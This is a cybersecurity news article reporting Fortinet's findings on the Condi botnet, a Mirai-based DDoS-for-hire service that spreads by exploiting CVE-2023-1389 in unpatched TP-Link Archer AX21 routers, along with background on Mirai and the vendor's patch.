Surging Condi Botnet Campaign Hits Unpatched TP-Link Routers

A stresser/booter service selling website disruptions via a Mirai-based botnet called Condi is the latest to target consumer-grade Wi-Fi routers running unpatched firmware.

See Also: OnDemand Webinar | Learn Why CISOs Are Embracing These Top ASM Use Cases Now

A threat actor has advertised the Condi botnet through a “Condi Network” Telegram channel launched in May 2022 and is monetizing the service by offering distributed denial-of-service attacks as well as selling the source code for the botnet itself, security researchers at cybersecurity firm Fortinet reported.

Recent versions of the botnet source code have been updated to target TP-Link Archer AX21 – aka AX1800 – routers that remain vulnerable to CVE-2023-1389, according to the FortiGuard Labs research team. The bug allows “an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request,” according to the U.S. National Vulnerability Database.

The bug is present in TP-Link Archer AX21 firmware versions prior to 1.1.4 build 20230219.

The TP-Link flaw became public knowledge during the Pwn2Own competition last December in Toronto, when three different teams independently exploited the flaw via either LAN or WAN. The teams also tipped off China-based TP-Link to the flaw, and in March the vendor updated the device firmware to patch the flaw.

In April, researchers from Trend Micro’s Zero Day Initiative reported that CVE-2023-1389 had been “added to the Mirai botnet arsenal.” Devices in Eastern Europe appeared to fall victim first, but infections have already spread outside the region.

Mirai-Based Botnets Power On

Numerous versions of Mirai are in the wild, and routers remain one of their top targets. Last month, security researchers warned that a flaw in numerous Zyxel network devices, fixed via an update released in April, was being exploited at a massive scale.

Mirai first appeared in 2016, thanks to three gamers designing a botnet that could infect a large number of internet of things devices by using their default or hard-coded credentials. While the original Mirai coders pleaded guilty to federal charges in 2017, someone leaked the Mirai source code online, and since then many different attackers have continued to adapt and use it.

They include the operator of Condi, who has already iterated the botnet’s source code multiple times. Fortinet’s teardown of the code found that the malware not only attempts to deactivate rival botnet code but also aims “to kill off older versions of Condi currently running on an infected device together with selected system processes,” including binaries that could be used to shut down or reboot the system, since this would eradicate the Mirai infection.

Fortinet researchers said the latest version of Condi abounds with serious errors “likely to wreak havoc and prevent the infected device from functioning correctly if the malware happens to terminate system processes.”

The original Mirai malware possessed the ability to spread itself to dozens of different types of IoT devices still in their default configuration. Subsequently, many versions of Mirai have been updated to target known vulnerabilities in a range IoT devices.

Target of Sample: Single Flaw

Fortinet’s researchers said that while versions of Condi previously seen in the wild also targeted a laundry list of devices with known vulnerabilities, the fresh sample they found only scans for CVE-2023-1389.

“Unlike most DDoS botnets, this sample does not propagate by trying different credentials,” the firm reported. “Instead, it embeds a simple scanner modified from Mirai’s original telnet scanner to scan for any public IPs with open ports 80 or 8080 – commonly used for HTTP servers – and then sends a hard-coded exploitation request to download and execute a remote shell script … which will infect the device with Condi if it is a vulnerable TP-Link Archer AX21 device.”

The malware sample reaches out to a command-and-control network that appears to tie to a domain connected to the Condi Network Telegram channel, according to Fortinet’s researchers. This suggests that, rather than this sample tying to someone who purchased the Condi source code and is running their own version of the DDoS botnet, the Condi operator is behind these attacks.

The researchers published a list of URLs that infected routers hail to download the remote shell script, as well as two known command-and-control server addresses, all of which can be blocked to defend against this particular Condi sample.